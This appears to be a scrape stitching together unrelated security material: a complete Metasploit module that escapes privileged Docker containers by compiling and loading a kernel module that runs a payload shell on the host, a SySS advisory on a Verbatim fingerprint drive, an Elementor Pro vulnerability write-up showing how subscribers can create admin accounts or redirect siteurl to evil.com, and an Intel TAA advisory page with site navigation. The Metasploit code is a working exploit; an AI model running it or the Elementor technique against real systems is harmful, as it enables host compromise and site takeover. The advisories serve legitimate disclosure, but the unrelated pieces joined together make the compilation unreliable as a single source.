    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::File  include Msf::Post::Unix  include Msf::Post::Linux::System  include Msf::Post::Linux::Kernel  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Docker Privileged Container Kernel Escape',          'Description' => %q{            This module performs a container escape onto the host as the daemon            user. It takes advantage of the SYS_MODULE capability. If that            exists and the linux headers are available to compile on the target,            then we can escape onto the host.          },          'License' => MSF_LICENSE,          'Author' => [            'Nick Cottrell <Rad10Logic>', # Module writer            'Eran Ayalon', # PoC/article writer            'Ilan Sokol' # PoC/article writer          ],          'Platform' => %w[linux unix],          'Arch' => [ARCH_CMD],          'Targets' => [['Automatic', {}]],          'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },          'SessionTypes' => %w[shell meterpreter],          'DefaultTarget' => 0,          'References' => [            %w[URL https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities],            %w[URL https://github.com/maK-/reverse-shell-access-kernel-module]          ],          'DisclosureDate' => '2014-05-01', # Went in date of commits in github URL          'Notes' => {            'Stability' => [ CRASH_SAFE ],            'Reliability' => [ REPEATABLE_SESSION ],            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]          }        }      )    )    register_advanced_options([      OptString.new('KernelModuleName', [true, 'The name that the kernel module will be called in the system', rand_text_alpha(8)], regex: /^[\w-]+$/),      OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', "/tmp/.#{rand_text_alpha(4)}"])    ])  end  # Check we have all the prerequisites to perform the escape  def check    # Checking database if host has already been disclosed as a container    container_name =      if active_db? && framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host        framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host      else        get_container_type      end    unless %w[docker podman lxc].include?(container_name.downcase)      return Exploit::CheckCode::Safe('Host does not appear to be container of any kind')    end    # is root user    unless is_root?      return Exploit::CheckCode::Safe('Exploit requires root inside container')    end    # Checking if the SYS_MODULE capability is enabled    capability_bitmask = read_file('/proc/1/status')[/^CapEff:\s+[0-9a-f]{16}$/][/[0-9a-f]{16}$/].to_i(16)    unless capability_bitmask & 0x0000000000010000 > 0      return Exploit::CheckCode::Safe('SYS_MODULE Capability does not appear to be enabled')    end    CheckCode::Vulnerable('Inside Docker container and target appears vulnerable.')  end  def exploit    krelease = kernel_release    # Check if kernel header folders exist    kernel_headers_path = [      "/lib/modules/#{krelease}/build",      "/usr/src/kernels/#{krelease}"    ].find { |path| directory?(path) }    unless kernel_headers_path      fail_with(Failure::NoTarget, 'Kernel headers for this target do not appear to be installed.')    end    vprint_status("Kernel headers found at: #{kernel_headers_path}")    # Check that our required binaries are installed    unless command_exists?('insmod')      fail_with(Failure::NoTarget, 'insmod does not appear to be installed.')    end    unless command_exists?('make')      fail_with(Failure::NoTarget, 'make does not appear to be installed.')    end    # Check that container directory is writable    if directory?(datastore['WritableContainerDir']) && !writable?(datastore['WritableContainerDir'])      fail_with(Failure::BadConfig, "#{datastore['WritableContainerDir']} is not writable")    end    # Checking that kernel module isn't already running    if kernel_modules.include?(datastore['KernelModuleName'])      fail_with(Failure::BadConfig, "#{datastore['KernelModuleName']} is already loaded into the kernel. You may need to remove it manually.")    end    # Creating source files    print_status('Creating files...')    mkdir(datastore['WritableContainerDir']) unless directory?(datastore['WritableContainerDir'])    write_kernel_source(datastore['KernelModuleName'], payload.encoded)    write_makefile(datastore['KernelModuleName'])    register_files_for_cleanup([      "#{datastore['KernelModuleName']}.c",      'Makefile'    ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })    # Making exploit    print_status('Compiling the kernel module...')    results = cmd_exec("make -C '#{datastore['WritableContainerDir']}' KERNEL_DIR='#{kernel_headers_path}' PWD='#{datastore['WritableContainerDir']}'")    vprint_status('Make results')    vprint_line(results)    register_files_for_cleanup([      'Module.symvers',      'modules.order',      "#{datastore['KernelModuleName']}.mod",      "#{datastore['KernelModuleName']}.mod.c",      "#{datastore['KernelModuleName']}.mod.o",      "#{datastore['KernelModuleName']}.o"    ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })    # Checking if kernel file exists    unless file_exist?("#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko")      fail_with(Failure::PayloadFailed, 'Kernel module did not compile. Run with verbose to see make errors.')    end    print_good('Kernel module compiled successfully')    # Loading module and running exploit    print_status('Loading kernel module...')    results = cmd_exec("insmod '#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko'")    unless results.blank?      results = results.strip      vprint_status('Insmod results: ' + (results.count("\n") == 0 ? results : ''))      vprint_line(results) if results.count("\n") > 0    end  end  def cleanup    # Attempt to remove kernel module    if kernel_modules.include?(datastore['KernelModuleName'])      vprint_status('Cleaning kernel module')      cmd_exec("rmmod #{datastore['KernelModuleName']}")    end    # Check that kernel module was removed    if kernel_modules.include?(datastore['KernelModuleName'])      print_warning('Payload was not a oneshot and cannot be removed until session is ended')      print_warning("Kernel module [#{datastore['KernelModuleName']}] will need to be removed manually")    end    super  end  def write_kernel_source(filename, payload_content)    file_content = <<~SOURCE      #include<linux/init.h>      #include<linux/module.h>      #include<linux/kmod.h>      MODULE_LICENSE("GPL");      static int start_shell(void){      #{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, 'command')}      char *argv[] = {"/bin/bash", "-c", command, NULL};      static char *env[] = {      "HOME=/",      "TERM=linux",      "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };      return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);      }      static int init_mod(void){      return start_shell();      }      static void exit_mod(void){      return;      }      module_init(init_mod);      module_exit(exit_mod);    SOURCE    filename = "#{filename}.c" unless filename.end_with?('.c')    write_file(File.join(datastore['WritableContainerDir'], filename), file_content)  end  def write_makefile(filename)    file_contents = <<~SOURCE      obj-m +=#{filename}.o      all:      \tmake -C $(KERNEL_DIR) M=$(PWD) modules      clean:      \tmake -C $(KERNEL_DIR) M=$(PWD) clean    SOURCE    write_file(File.join(datastore['WritableContainerDir'], 'Makefile'), file_contents)  endend

Docker Privileged Container Kernel Escape

When analyzing the Verbatim Fingerprint Secure Portable Hard Drive, Matthias Deeg found out that the content of the emulated CD-ROM drive containing the Windows and macOS client software can be manipulated. The content of this emulated CD-ROM drive is stored as ISO-9660 image in the "hidden" sectors of the USB drive that can only be accessed using special IOCTL commands, or when installing the drive in an external disk enclosure.

Advisory ID:               SYSS-2022-017  
Product:                   Fingerprint Secure Portable Hard Drive  
Manufacturer:              Verbatim  
Affected Version(s):       #53650  
Tested Version(s):         #53650  
Vulnerability Type:        Insufficient Verification of Data   
Authenticity (CWE-345)  
Risk Level:                Low  
Solution Status:           Open  
Manufacturer Notification: 2022-02-03  
Solution Date:             -  
Public Disclosure:         2022-06-08  
CVE Reference:             CVE-2022-28385  
Author of Advisory:        Matthias Deeg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with  
AES 256-bit hardware encryption and a built-in fingerprint sensor for  
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the  
drive in real-time. The drive is compliant with GDPR requirements as  
100% of the drive is securely encrypted. The built-in fingerprint  
recognition system allows access for up to eight authorised users and  
one administrator who can access the device via a password. The hard  
drive does not store passwords in the computer or system's volatile  
memory making it far more secure than software encryption."[1]

Due to missing integrity checks, an attacker can manipulate the content  
of the emulated CD-ROM drive containing the Windows and macOS client  
software.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When analyzing the Verbatim Fingerprint Secure Portable Hard Drive,  
Matthias Deeg found out that the content of the emulated CD-ROM drive  
containing the Windows and macOS client software can be manipulated.

The content of this emulated CD-ROM drive is stored as ISO-9660 image  
in the "hidden" sectors of the USB drive that can only be accessed  
using special IOCTL commands, or when installing the drive in an  
external disk enclosure.

The following output exemplarily shows the content of the ISO-9660  
file system:

# mount hidden_sectors.bin /mnt/

# lsd -laR /mnt/  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .  
drwxr-xr-x root root 4.0 KB Fri Jan  7 16:39:47 2022  ..  
.r-xr-xr-x root root  70 B  Wed Aug 14 09:20:40 2019  Autorun.inf  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  MAC  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Windows

/mnt/MAC:  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..  
.r-xr-xr-x root root  13 KB Fri Aug  9 09:03:24 2019  setup  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Source

/mnt/MAC/Source:  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..  
.r-xr-xr-x root root 5.9 MB Mon Jul 22 06:22:24 2019  gtk_dylib.tar  
.r-xr-xr-x root root 1.0 MB Wed Aug 14 06:25:10 2019  VERBATIM_B0_V1.1.tar

/mnt/Windows:  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..  
.r-xr-xr-x root root 5.6 KB Fri Aug  9 10:47:26 2019  English.txt  
.r-xr-xr-x root root 6.6 KB Fri Aug  9 10:47:26 2019  French.txt  
.r-xr-xr-x root root 6.2 KB Fri Aug  9 10:47:26 2019  German.txt  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  Ico  
.r-xr-xr-x root root 6.2 KB Fri Aug  9 10:47:26 2019  Italian.txt  
.r-xr-xr-x root root 512 B  Fri Aug  9 10:47:26 2019  license.bin  
.r-xr-xr-x root root 160 KB Fri Aug  9 10:47:26 2019  odbccp32.dll  
.r-xr-xr-x root root 7.1 KB Fri Aug  9 10:47:26 2019  Spanish.txt  
.r-xr-xr-x root root 4.9 MB Wed Aug 14 09:12:49 2019  VerbatimSecure.exe

/mnt/Windows/Ico:  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  .  
dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019  ..  
.r-xr-xr-x root root  34 KB Fri Aug  9 10:47:26 2019  Verbatim.ico

By manipulating this ISO-9660 image or replacing it with another one, an  
attacker is able to store malicious software on the emulated CD-ROM  
drive which then may get executed by an unsuspecting victim when using  
the device.

For example, an attacker with temporary physical access during the  
supply could program a modified ISO-9660 image on the Verbatim  
Fingerprint Secure Portable Hard Drive, which always uses an attacker-  
controlled password for unlocking the device.

If, later on, the attacker gains access to the used USB drive, he can  
simply decrypt all contained user data.

Storing other arbitrary, malicious software is also possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS could successfully modify the content of the ISO-9660 image  
containing the Windows and macOS software for unlocking and managing the  
Verbatim Fingerprint Secure Portalbe Hard Drive.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer  
2022-02-11: Vulnerability reported to manufacturer again  
2022-03-07: Vulnerability reported to manufacturer again  
2022-06-08: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Verbatim Fingerprint Secure Portable Hard Drive

 https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/  
[2] SySS Security Advisory SYSS-2022-017

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-017.txt  
[3] SySS GmbH, SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de  
Public Key:   
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc  
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Verbatim Fingerprint Secure Portable Hard Drive #53650 Insufficient Verification

The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.

Elementor Pro, a popular page builder plugin for WordPress, fixed a broken access control vulnerability affecting versions <=3.11.6 that could allow full site takeover.

**Authenticated Arbitrary WordPress Options Change**

CVSS v3.1: 8.8 (High)

> Note: The vulnerability affects the premium version of the plugin, not the free one available at wordpress.org.

When Elementor Pro is installed on a site that has WooCommerce activated, it loads its “elementor-pro/modules/woocommerce/module.php” component, which registers a couple of AJAX actions:

/\*\*
 \* Register Ajax Actions.
 \*
 \* Registers ajax action used by the Editor js.
 \*
 \* @since 3.5.0
 \*
 \* @param Ajax $ajax
 \*/
public function register\_ajax\_actions( Ajax $ajax ) {
   // \`woocommerce\_update\_page\_option\` is called in the editor save-show-modal.js.
   $ajax->register\_ajax\_action( 'pro\_woocommerce\_update\_page\_option', \[ $this, 'update\_page\_option' \] );
   $ajax->register\_ajax\_action( 'pro\_woocommerce\_mock\_notices', \[ $this, 'woocommerce\_mock\_notices' \] );
}

One of them is pro_woocommerce_update_page_option, which is used by Elementor’s built-in editor. It calls update_option, a function that can be used to modify WordPress options in the database, with two user-submitted input:

/\*\*
 \* Update Page Option.
 \*
 \* Ajax action can be used to update any WooCommerce option.
 \*
 \* @since 3.5.0
 \*
 \* @param array $data
 \*/
public function update\_page\_option( $data ) {
   update\_option( $data\['option\_name'\], $data\['editor\_post\_id'\] );
}

This function is supposed to allow the Administrator or the Shop Manager to update some specific WooCommercerce options, but user input aren’t validated and the function lacks a capability check to restrict its access to a high privileged user only.

Elementor uses its own AJAX handler to manage most of its AJAX actions, including pro_woocommerce_update_page_option, with the global elementor_ajax action. It is located in the “elementor/core/common/modules/ajax/module.php” script of the free version (which is required to run Elementor Pro) :

/\*\*
 \* Handle ajax request.
 \*
 \* Verify ajax nonce, and run all the registered actions for this request.
 \*
 \* Fired by \`wp\_ajax\_elementor\_ajax\` action.
 \*
 \* @since 2.0.0
 \* @access public
 \*/
public function handle\_ajax\_request() {
   if ( ! $this->verify\_request\_nonce() ) {
      $this->add\_response\_data( false, esc\_html\_\_( 'Token Expired.', 'elementor' ) )
         ->send\_error( Exceptions::UNAUTHORIZED );
   }
   ...

We can see that it includes a nonce check that could potentially prevent bad actors from exploiting the vulnerability. But the nonce and all JS code related to it is loaded via the admin_enqueue_scripts hook in “elementor/core/common/app.php”:

add\_action( 'admin\_enqueue\_scripts', \[ $this, 'register\_scripts' \] );

It therefore leaks in the source of the page to all logged in users:

An authenticated attacker can leverage the vulnerability to create an administrator account by enabling registration (users_can_register) and setting the default role (default_role) to “administrator”, change the administrator email address (admin_email) or, as shown below, redirect all traffic to an external malicious website by changing siteurl among many other possibilities:

MariaDB \[example\]> SELECT \* FROM \`wp\_options\` WHERE \`option\_name\`='siteurl';
+-----------+-------------+------------------+----------+
| option\_id | option\_name | option\_value     | autoload |
+-----------+-------------+------------------+----------+
|         1 | siteurl     | https://evil.com | yes      |
+-----------+-------------+------------------+----------+
1 row in set (0.001 sec)

Because the vulnerable component requires WooCommerce to be installed, an unauthenticated user can create a WooCommerce customer account, log in and exploit the vulnerability too (WooCommerce customers can access the back-end by adding wc-ajax=1 to the query, e.g., https://example.com/wp-admin/?wc-ajax=1).

**Timeline**

The vulnerability was discovered and reported to the authors on March 18, 2023, and a new version 3.11.7 was released on March 22, 2023.

**Recommendations**

Update immediately if you have version 3.11.6 or below installed. If you are using our web application firewall for WordPress, NinjaFirewall WP Edition (free) and NinjaFirewall WP+ Edition (premium), you are protected against this vulnerability.  
Additionally, users who had the vulnerable plugin installed on their website have been notified in real time about the security update.

**Stay informed about the latest vulnerabilities**

*   Running WordPress? You can get email notifications about vulnerabilities in the plugins or themes installed on your blog.
*   On Twitter: @nintechnet

CVE-2023-3124: High severity vulnerability fixed in WordPress Elementor Pro plugin.

TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – TSX Asynchronous Abort Advisory**

**Summary: **

A potential security vulnerability in TSX Asynchronous Abort (TAA) for some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID:  CVE-2019-11135

Description:  TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products: **

This issue affects all current processors that support Intel© TSX unless IA32\_ARCH\_CAPABILITIES.TAA\_NO (bit 8)=1. On CPUs affected by MDS, where IA32\_ARCH\_CAPABILITIES.MDS\_NO (bit 5)=0, the existing MDS mitigations will also mitigate against TAA. 

A list of impacted products can be found here.

**Recommendations:  
**

Intel recommends that users of the affected Intel® Processors listed above, update to the latest firmware version provided by the system manufacturer that addresses these issues.

For additional microcode information about the affected products, see here for the generic list of latest microcode updates including those for Intel-SA-00270.  

Additional technical details about TAA can be found here.

Additional Advisory Guidance on CVE-2019-11135 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding and reporting the vulnerability to us via coordinated disclosure.

Intel thanks VU Amsterdam, CISPA to coordinate disclosure of TAA after the initial publication of their RIDL paper.  

VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

CISPA Helmholtz Center for Information Security: Giorgi Maisuradze.

Intel thanks TU Graz and KU Leuven to coordinate disclosure of TAA after the initial publication of their ZombieLoad paper.  

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Researchers from VUSec group at VU Amsterdam and CISPA Helmholtz Center provided Intel with a Proof of Concept (POC) in September 2018 and researchers from TU Graz and Ku Leuven provided Proof of Concept (POC) in April 2019. Intel subsequently confirmed each submission demonstrates TAA individually.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available. 

**Revision History**

Revision

Date

Description

1.0

11/12/2019  

Initial Release

1.1

11/12/2019

Updated Affected Products & Microcode References

1.2

12/03/2019

Updated Affected Products

1.3

04/21/2020

Updated Affected Products

1.4

09/29/2020

Updated Affected Products

1.5

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Search

lenovo warranty check/lookup | check warranty status | lenovo support us